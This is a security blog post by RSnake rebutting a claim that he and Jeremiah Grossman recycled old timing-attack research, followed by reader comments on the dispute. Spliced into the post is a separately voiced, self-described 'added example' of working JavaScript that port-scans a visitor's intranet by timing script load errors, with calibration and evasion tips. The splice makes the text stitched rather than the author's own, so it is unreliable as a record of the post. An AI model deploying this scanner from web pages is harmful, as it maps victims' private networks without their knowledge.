web application security lab

RSnake Puts Up

I just can’t seem to avoid controversy lately. This time Billy Hoffman decided to take a stab at something I am still befuddled by. He claimed Jeremiah Grossman and I re-presented a paper from 7 years ago. Wow, I think someone must have missed our talk and/or failed to read the paper completely. We only mentioned timing attacks in passing and in totally different contexts. Further, I’ve never once claimed to come up with the concept of timing attacks. In fact, quite the opposite. If he had read my blog carefully he would have seen that I fully admitted I had first read about the concept of it in Hacking Web Applications Exposed 2. Then in Billy’s best showdown lingo I am given the ultimatum to put up or shut up. Eesh.

I’m really not even sure what Billy thinks we stole, because the one thing we talked about in regards to timing attacks was about measuring JavaScript error time to port scan intranets, which is a concept that is not once mentioned in the paper he cites. The paper is a really good one on other practical uses for timing attacks, however, it neither mentions intranets, nor does it mention port scanning. Not really the same application but similar techniques - you will get no disagreements from me there. I guess I could see why Billy could be confused. As a side note, as maluc pointed out, this paper is where the concept of timing attacks originated and is far older than the paper Billy cites. Neither of which has much to do with our talk, but there you have it.
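The technique named above, timing how long a JavaScript load error takes to arrive in order to tell which intranet addresses answer, as an added example that is not code from the original post or from its authors. The idea: a `<script>` tag pointed at an internal host and port fails quickly when something answers (connection refused, or a non-HTTP service that sends bytes the browser rejects) and only after the browser's connect timeout when nothing does (address unused, host down, or silently filtered). The error itself carries no information across origins; its timing does. All function names, the thresholds and the sample timings are this example's own assumptions, and the sample results are constructed rather than captured.

```javascript
// Added example: timing-based intranet probing via <script> error timing.
// probeViaScript runs only in a browser page; classifyTimings and
// calibrate are pure and run anywhere (including Node, for the sample below).

// Browser side: resolve with the elapsed milliseconds until the script
// element fires onerror (nothing usable came back) or onload (an HTTP
// server answered), or until our own cap expires. Hypothetical helper.
function probeViaScript(url, capMs) {
  return new Promise((resolve) => {
    const started = Date.now();
    const el = document.createElement('script');
    let done = false;
    const finish = (how) => {
      if (done) return;
      done = true;
      el.remove();
      resolve({ url, how, elapsedMs: Date.now() - started });
    };
    el.onerror = () => finish('error');
    el.onload = () => finish('load');
    setTimeout(() => finish('cap'), capMs);
    el.src = url;
    document.head.appendChild(el);
  });
}

// Analysis side: label each target by where its error time falls relative
// to two thresholds. "responsive" = something on that address answered the
// connection attempt; "unresponsive" = the connect attempt timed out;
// "open-http" = an HTTP server returned a body (onload fired);
// "ambiguous" = between the two cuts, worth re-probing.
function classifyTimings(results, { fastMs = 200, slowMs = 1500 } = {}) {
  const labels = {};
  for (const r of results) {
    if (r.how === 'load') labels[r.url] = 'open-http';
    else if (r.how === 'cap' || r.elapsedMs >= slowMs) labels[r.url] = 'unresponsive';
    else if (r.elapsedMs <= fastMs) labels[r.url] = 'responsive';
    else labels[r.url] = 'ambiguous';
  }
  return labels;
}

// Thresholds depend on the victim's network, so derive them from a
// known-live address (e.g. the default gateway) and a known-dead one
// before scanning: fast cut a few multiples above the live baseline,
// slow cut well below the dead baseline. The multipliers are assumptions.
function calibrate(liveErrorMs, deadErrorMs) {
  const fastMs = liveErrorMs * 3;
  const slowMs = Math.max(fastMs + 1, Math.floor(deadErrorMs / 2));
  return { fastMs, slowMs };
}

// Constructed sample results, standing in for a real run from a page
// against a 10.0.0.0/24 intranet. Ports chosen to avoid the browsers'
// built-in blocked-port lists, which fail instantly regardless of host state.
const SAMPLE = [
  { url: 'http://10.0.0.1:81/',   how: 'error', elapsedMs: 31 },   // refused fast
  { url: 'http://10.0.0.2:81/',   how: 'error', elapsedMs: 2998 }, // connect timeout
  { url: 'http://10.0.0.3:80/',   how: 'load',  elapsedMs: 120 },  // web server
  { url: 'http://10.0.0.4:8080/', how: 'cap',   elapsedMs: 5000 }, // our cap hit
  { url: 'http://10.0.0.5:81/',   how: 'error', elapsedMs: 700 },  // in between
];

const thresholds = calibrate(40, 3000);       // {fastMs: 120, slowMs: 1500}
console.log(classifyTimings(SAMPLE, thresholds));
```

Two caveats a practitioner would want: browsers refuse many low-numbered ports outright (the error arrives immediately and says nothing about the host), so restrict the scan to ports the browser will actually connect to; and a single measurement per address is noisy, so repeat each probe and take the median before classifying.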

The only other thing I can think of that would confuse Billy is that we talk about our attacks as working with and without JavaScript. The paper Billy cites does mention a JavaScript-less version of an attack, but he was talking about using it to detect if you have been somewhere or not. Jeremiah and I have totally different (and far more accurate) ways to do that, which is actually what we discussed - we didn’t even touch on using timing attacks for that purpose because it’s so much less effective than the ways we have come up with over the last year and a half. Anyway, we didn’t claim to invent JavaScript-less attacks either. I know, I know, it’s crazy to think we came up with and built everything we said we did.

So just to cover my bases in the off chance someone can figure out a way I have trampled all over the intellectual rights of any of the aforementioned papers, I hereby cite Paul Kocher and Edward Felten for the concept of timing attacks, and Al Gore and ARPAnet for the concept of the Internet and every other concept my attacks have been based on over the years. Rest assured, unlike some people in this industry I never steal research, and if I do so inadvertently, I own up to it and publicly retract. I’ve done so dozens of times on my blog whenever I find out I am in error, whether I find my error on my own or when it is communicated to me, and that’s not about to change. And if I know that I am getting awfully close to copying someone else’s work, I always find a way to make it clear that that is what I’m doing. For the record I have no problem with SPI Dynamics - as I’ve been meeting more and more of them I’m getting to know and like them, Caleb, Michael and Jeff are all great guys. Even though we’ve had our bumps in regards to who originally came up with JS port scanning, which I am well beyond done arguing about, I actually like some of the stuff coming out of that camp. Anyway, this post probably isn’t interesting to anyone - unless you just happen to be trying to publicly disparage our work… or something.

11 Responses to “RSnake Puts Up”

  1. dblw1de Says:

    Billy continues to prove to me that he is simply a child trying to impress daddy in a man’s world.

    SPI/HP would do well to re-think whom they allow to use their good name and how said people behave.

  2. Mordecai P. Merriweather Says:

    Oh snap! RSnake busted out the Al Gore. Now Billy Hoffman’s criticisms are totally trivialized. You can’t step to the R to the Snake, Felten!

    How is the Jeremiah Grossman Coattail Ride, by the way? I hear it’s better than Magic Mountain.

  3. Michael Says:

    My friends and I were using “race conditions” and symlinks to exploit sendmail and escalate to root on 4.2 BSD systems — that would have been mid-eighties for you young fellers. I’m pretty sure we didn’t invent timing attacks either, because I am sure somebody described something similar against CMS/CP in the “Adolescence of P/1.”

    Remember Microsoft invented multi-tasking when they shipped NT.

    I wouldn’t worry about it, anyone who can coin the phrase “Premature AJAX-ulation” won’t hold a grudge for long.

  4. your mom Says:

    Yeah, everyone knows Billy Hoffman can be a jerk. I suppose he’s just bitter.

  5. RSnake Says:

    @dblw1de - I’m definitely not out to get anyone fired. But perhaps some PR training is in order.

    @Mordecai - cute! I’ve always liked roller coasters. Interesting non-technical come-back btw. You sure pwned me, or something.

    @Michael - they had computers in the 80’s? ;)

  6. Ronald van den Heetkamp Says:

    I’ve seen that site before ranting about nothing. Not sure what is going on lately but it takes all the fun out of it.

    In the end, what does it matter who came up with it; timing attacks have existed since computers have existed. So who invented it? I don’t know and hardly care actually. Okay, it’s even as legit as saying: hey, I was the first person who triggered a buffer overflow. So what, this territorial behaviour really destroys the scene and the fun. :(

  7. rdivilbiss Says:

    There’s a bit of a difference between expanding a topic to include new information and appearing to be lifting text wholesale from another person’s presentation. Sounds like a youngster vying for some credibility to me. Not saying he can’t come up with interesting ideas on his own, but this seems awfully petty.

  8. Robert A. Says:

    I always joke with Jeremiah that the appsec space is full of so much drama.

    And so it continues! :)

    - Robert A.

  9. alt.sysrec Says:

    Petty stuff. Unfortunate you have to waste time responding to issues like this. As others have mentioned, there is a LOT of good work being done by everyone in the scene. You, JG, pdp, Ronald, whiteacid and even occasionally billy continue to produce, and more importantly share cool xss/js stuff.

    I expect this to come up more frequently as this area of research gets increased visibility. I don’t know billy, but I would not put it past HP lawyers to encourage him to protect any of their potential intellectual property so they can flush it down the toilet like they have done with acquisitions (and IP) over the past decade or two.

    Thanks for all your work RSnake.

  10. Arian Says:

    Well now….

    I’ve written about and tested for timing-based attacks on the web for years, completely different to Jer’s, Rsnake’s, and Felten’s. Most recently was some notes on this in the HEWA 2nd Edition book, which Rsnake blogged about. (thanks man, btw!)

    I’ve never read Felten’s papers. I got the *original* ideas I experimented with from something David Litchfield told me he was doing in a completely different direction /years/ ago. And I do not hesitate to tell anyone who asks that I credit David Litchfield for stimulating my thoughts in this direction.

    Later someone blasted me for copying and failing to credit work done IN THE 1970’s on timing-based attacks against UNIX systems. Yikes! I don’t even /remember/ what web apps /looked like/ back in the 70’s.

    Anyway, this smacks of ridiculous posturing and feels like the wrath of a woman scorned. Some soothing words might assuage the anguish of any fragile egos involved. :)

  11. Mike Says:

    I am in agreement with the fact that the territorial stuff takes all the fun out of it and it is pointless. I see this in other activities as well. I left a martial arts school because of it. It sucks when egos get in the way.
    Who cares, can’t we all just discuss, create, debate, have fun and learn?